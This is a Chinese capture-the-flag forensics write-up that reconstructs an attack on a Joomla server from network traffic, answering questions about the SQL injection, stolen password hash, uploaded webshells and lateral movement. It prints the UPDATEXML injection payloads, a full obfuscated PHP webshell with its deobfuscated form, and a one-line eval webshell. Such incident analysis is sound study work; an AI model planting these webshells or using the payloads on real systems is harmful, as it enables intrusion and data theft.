题目链接: https://pan.baidu.com/s/1b6bkW-J8vKASr8C2r9vsdQ 密码: nux4
题目描述
1.黑客攻击的第一个受害主机的网卡IP地址
2.黑客对URL的哪一个参数实施了SQL注入
3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_)
4.第一个受害主机网站数据库的名字
5.Joomla后台管理员的密码是多少
6.黑客第一次获得的php木马的密码是什么
7.黑客第二次上传php木马是什么时间
8.第二次上传的木马通过HTTP协议中的哪个头传递数据
9.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)
10.php代理第一次被使用时最先连接了哪个IP地址
11.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候
12.黑客在内网主机中添加的用户名和密码是多少
13.黑客从内网服务器中下载下来的文件名

1.黑客攻击的第一个受害主机的网卡IP地址

2.黑客对URL的哪一个参数实施了SQL注入

过滤http包可以看出,攻击者ip 202.1.1.2   服务器ip 192.168.1.8

并对list[select]参数进行注入,看着时间顺序,很明显是自动化注入,手注的时间间隔没有这么短呀。

3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_)

从前几个注入的返回包来看,数据库前缀是ajtuc_

4.第一个受害主机网站数据库的名字

找到最后一个注入,查看返回包,所以第一个受害主机数据库名joomla.ajtuc_users

百度得知Joomla!是一套内容管理系统。 使用PHP语言加上MySQL数据库所开发的软件系统,可以在Linux、 Windows、MacOSX等各种不同的平台上执行。

5.Joomla后台管理员的密码是多少

密码的提交一般都是post方式,

ip.addr ==192.168.1.8 && http contains "password" && http.request.method == POST

但看其他表哥说,密码并不是这个

或者通过查看注入包来找到对应的密码hash后,解密得到。。。

ip.addr == 192.168.1.8 && http contains "password"

三条信息分别回显

Status: 500 XPATH syntax error: 'qqzvq$2y$10$lXujU7XaUviJDigqqkkq' SQL=SELECT (UPDATEXML(5928,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),7096)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`Status: 500 XPATH syntax error: 'qqzvqFMzKy6.wx7EMCBqpzrJdn7qqkkq' SQL=SELECT (UPDATEXML(3613,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),23,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),7939)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`Status: 500 XPATH syntax error: 'qqzvqzi/8B2QRD7qIlDJeqqkkq' SQL=SELECT (UPDATEXML(8949,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),45,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),3079)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`

可以看到数据

qqzvq$2y$10$lXujU7XaUviJDigqqkkq
qqzvqFMzKy6.wx7EMCBqpzrJdn7qqkkq
qqzvqzi/8B2QRD7qIlDJeqqkkq

我们观察sql构造,发现具有前缀和后缀

0x71717a7671
0x71716b6b71

解码后得到

qqzvq
qqkkq

我们去掉前缀和后缀,可以得到

$2y$10$lXujU7XaUviJDig
FMzKy6.wx7EMCBqpzrJdn7
zi/8B2QRD7qIlDJe

于是我们可以得到完整的加密密码

$2y$10$lXujU7XaUviJDigFMzKy6.wx7EMCBqpzrJdn7zi/8B2QRD7qIlDJe     后面解码部分就卡住咯

6.黑客第一次获得的php木马的密码是什么上传的话 ip.addr ==192.168.1.8 && http

发现有一个kkkaaa.php 估计就是上传的马儿了数据包二ip.addr ==192.168.1.8 && http contains "kkkaaa.php"

发现base64,估计用的菜刀连的小马,所以第一个上传的马儿的密码是zzz

7.黑客第二次上传php木马是什么时间

查看kkkaaa.php相关的流量

z2的值很明显是hex类型,复制到winhex后,发现对应的Unicode是一段混淆后的php

<?php
$p='l>]ower";$i>]=$m[1][0].$m[1]>][1];$h>]=$>]sl($ss(m>]d5($i.>]$kh),0>],3))>];$f=$s>]l($s>]s(md5';
$d=']q=array_v>]>]alues(>]$q);>]preg_match_a>]ll("/(>][\\w]>])[\\w->]]+>](?:;q=>]0.([\\d]))?,?/",>';
$W='),$ss(>]$s[>]$i],>]0,$e))),$>]>]k)));>]$o=ob_get_content>]>]s();ob_end_>]>]clean();$d=>]base';
$e=']T_LANGUAGE"];if($rr>]&&$>]ra){$>]u=pars>]e_>]url($rr);par>]se_st>]r($u[">]query"],$>]q);$>';
$E='>]64_e>]ncod>]e>](>]x(gz>]compress($o),$k));pri>]nt("<$k>$d<>]/$k>">])>];@>]session_destr>]oy();}}}}';
$t='($i.>]$kf),0,3>]));$p>]="";fo>]r($z=1>];$z<>]count($m>][1]);$z+>]>]+)$p>].=$q[$m[>]2][$z]];i>';
$M=']$ra,$>]m);if($q>]&&$m>]){@sessi>]on_sta>]>]rt();$s=&$>]_SESS>]ION;$>]>]s>]s="substr";$sl="s>]>]trto';
$P=']f(s>]tr>]pos($p>],$h)===0){$s[>]$i]="";$p>]=$ss($>]p,3);>]}if(ar>]ray>]_key_exist>]>]s($i,$>]s)>]){$>';
$j=str_replace('fr','','cfrrfreatfrfre_funcfrtfrion');
$k='];}}re>]>]turn $o;>]}$>]r=$_SERV>]ER;$rr=@$r[>]"HTTP>]_REFERE>]R"];$ra>]=@>]$r[">]HTTP_A>]CC>]EP>';
$g='"";for(>]$i=>]0;$i<$l;>])>]{for($j=0;($j<>]$c&&>]$i<$l);$>]j++,$i>]++){$o.>]=$t{$i>]}^$k{$j}>';
$R='$k>]h="cb4>]2";$kf="e130">];functio>]n>] x($t>],$k){$c=s>]trle>]>]n($k);$l=strle>]n>]($t)>];$o=';
$Q=']s[$i].=$p;$e=strp>]>]os(>]$s[$i>]],$f);if($>]e){$k=$kh.$k>]f;>]ob_sta>]rt();@e>]val(@gzun>]co>';
$v=']mpress(@x>](@b>]as>]>]e64_decode(pr>]>]e>]g_repla>]ce(array("/_/","/-/"),arr>]ay(>]"/","+">]';
$x=str_replace('>]','',$R.$g.$k.$e.$d.$M.$p.$t.$P.$Q.$v.$W.$E);
$N=$j('',$x);$N();
?>

反混淆的地方卡住了,,,,

反混淆后

<?php
function x($t, $k)
{$c = strlen($k);$l = strlen($t);$o = "";for ($i = 0; $i < $l;) {for ($j = 0; $j < $c && $i < $l; $j++, $i++) {$o .= $t[$i] ^ $k[$j];}}return $o;
}
$rr = @$_SERVER["HTTP_REFERER"];
$ra = @$_SERVER["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {$u = parse_url($rr);parse_str($u["query"], $q);$q = array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);if ($q && $m) {@session_start();$s =& $_SESSION;$i = $m[1][0] . $m[1][1];$h = strtolower(substr(md5($i . "cb42"), 0, 3));$f = strtolower(substr(md5($i . "e130"), 0, 3));$p = "";for ($z = 1; $z < count($m[1]); $z++) {$p .= $q[$m[2][$z]];}if (strpos($p, $h) === 0) {$s[$i] = "";$p = substr($p, 3);}if (array_key_exists($i, $s)) {$s[$i] .= $p;$e = strpos($s[$i], $f);if ($e) {$k = "cb42e130";ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), substr($s[$i], 0, $e))), "cb42e130")));$o = ob_get_contents();ob_end_clean();$d = base64_encode(x(gzcompress($o), "cb42e130"));print "<{$k}>{$d}</{$k}>";@session_destroy();}}}
}

所以这是第二个php木马,上传时间 17:20:44.248365000

8.第二次上传的木马通过HTTP协议中的哪个头传递数据

从第二个木马中可以看到

$rr = @$_SERVER["HTTP_REFERER"];
$ra = @$_SERVER["HTTP_ACCEPT_LANGUAGE"];

所以是通过HTTP_REFERER,HTTP_ACCEPT_LANGUAGE来传递的数据

从z1 参数 b64decode 后,可以看到上传路径/var/www/html/joomla/tmp/footer.php

so,第二个木马的名称为footer.php

9.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)

这里应该是黑客拿下服务器192.168.1.8后,利用该机内网渗透

所以 ip.addr ==192.168.1.8 && mysql

一直到第四个数据包才找到和mysql相关的数据

admin/1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4

10.php代理第一次被使用时最先连接了哪个IP地址

代理第一次被使用时最先连接了IP  4.2.2.2

11.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候

获取当前目录肯定得有ls或者dir

so

ip.addr==192.168.1.8  && (http contains "ls" ||http contains "dir")

一直到第九个包才才找到。。

‘;

黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在18:36:59

可以看到内网中的另外一台主机为192.168.2.20

12.黑客在内网主机中添加的用户名和密码是多少

内网主机的ip为 192.168.2.20

所以ip.addr ==192.168.2.20 &&http

黑客通过1.8服务器作为跳板,在2.20机器上写下内容为<?php eavl($_POST[123]);?> 的sh.php

可看出2.20为windows机器

菜刀的请求包太多,一个个的decode太麻烦,,可以查看返回包来判断啥时候在2.20机器上添加的user

18:49:27还没有kaka用户,等到18:50:42就出现了kaka用户,所以说应该是在这两个时间点之间添加的用户

 

所以黑客在内网主机中添加的用户名和密码是kaka/kaka

12黑客从内网服务器中下载下来的文件名
既然是下载,应该是利用中国菜刀进行下载了,那我们只过滤出post流量,查看命令即可

ip.dst == 192.168.2.20 && http.request.method==POST
 

so,下载的文件为 lsass.exe_180208_185247.dmp

//copy z1,z2的value时,用快捷键(Ctrl+shfit+v)比较方便



转载于:https://www.cnblogs.com/1go0/p/10052228.html

2018信息安全铁人三项第三赛区数据赛题解相关推荐

  1. [BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop

    [BUUCTF-pwn]--铁人三项(第五赛区)_2018_rop 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop 思路:没有sytem函数 ...

  2. [BUUOJ]铁人三项(第五赛区)_2018_rop

    铁人三项(第五赛区)_2018_rop checksec看到保护全关,进IDA分析就是很简单的一串逻辑,在第二个函数处看到了明显的溢出,但是题目里面没有直接提供shell相关操作,所以判断本题为ret ...

  3. 信息安全 数据赛 铁人三项_2018信息安全铁人三项数据赛题解

    前言 由于自己赛区的铁三比赛在最后一场,于是利用闲暇时间做了一下别的赛区的题目,这里给出5月5号比赛的数据赛做题记录 题目分享: 链接: https://pan.baidu.com/s/1b6bkW- ...

  4. 信息安全 数据赛 铁人三项_2018.5.18信息安全铁人三项赛数据赛题解

    本文原创作者:一叶飘零 目录 题目描述 第一个数据包 第三个数据包 第四个数据包 路由器hacking 后记 题目描述 1.黑客的IP是多少 2.服务器1.99的web服务器使用的CMS及其版本号(请 ...

  5. BUUCTF 刷题 铁人三项(第五赛区)_2018_rop

    BUUCTF在线评测 直接ret2libc,很简单,但是write函数有三个参数要填充 exp: from pwn import * from LibcSearcher import *context ...

  6. BUUCTF(pwn)铁人三项(第五赛区)_2018_rop

    最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') ...

  7. 【BUUCTFPWN】铁人三项(第五赛区)_2018_rop

    先用checksec检查一下,只开了NX,能用栈溢出. IDA反编译一下,里面也很简单,就调用了一个be_nice_to_people和vulnerable_function两个函数. 一次查看一下, ...

  8. BUUCTF 铁人三项(第五赛区)_2018_rop

    完全可以使用同一个脚本,只需要进行略微修改 比如修改IP 端口 以及查找Libc的模块 BUUCTF jarvisoj_level3_Red-Leaves的博客-CSDN博客

  9. 信息安全 数据赛 铁人三项_信息安全铁人三项赛-赛事章程-信息安全铁人三项赛...

    赛事章程 竞赛总则 为贯彻<国务院关于大力推进大众创业万众创新若干政策措施的意见><国务院办公厅关于深化高等学校创新创业教育改革的实施意见>,落实中央网信办.国家发改委.教育部 ...

最新文章

  1. U3D 场景切换时 脚本对象,GO对象,资源对象的问题
  2. php - Api 接口写法规范和要求
  3. Skipping failed optional dependency /chokidar/fsevents
  4. loss function
  5. 【文章】孝心无价 作者:毕淑敏
  6. git缓冲区查看_git原理学习记录:从基本指令到背后原理,实现一个简单的git
  7. dell服务器r730老自动重启_Dell R730服务器安装windows server 2008 R2蓝屏问题
  8. 第一模块:开发基础 第1章 练习及作业
  9. 唐宇迪学习笔记2:Python数据分析处理库——pandas
  10. redis客户端下载(windos版本)
  11. 谷歌浏览器flash被禁用解决方法
  12. IDEA+Java控制台实现宠物管理系统
  13. 【已解决】el-form required 提示英文改中文
  14. VS编程,几个好用的Visual Studio
  15. fatal: detected dubious ownership in repository at ‘D:/‘之解决方法
  16. GBase 8a 部署(centos8)
  17. 厦门大学校园导游系统(图论)
  18. 183套免费简历模板,助大伙找个好工作
  19. 密码锁(春季每日一题 29)
  20. 2021年12月9日|12月10日|

热门文章

  1. 用turtle库画童年的记忆哆啦A梦
  2. Maya mayapy.exe 安装 Cython,编译 pyd
  3. 数据库复习之规范化理论应用(第八次上机内容)
  4. sql server 海量数据速度提升:SQL优化-索引(7) 【转】
  5. 分享我第一次做项目的感受
  6. STM32 C/C++ uCOSII 函数调用return 无法返回或者函数无法正常反回上一层函数的问题
  7. 【目录】shell 编程-xyq
  8. linux 文件及目录结构体系
  9. order by 子查询_视图,子查询,标量子查询,关联子查询
  10. 简单约瑟夫环问题解法汇总(模拟/数论)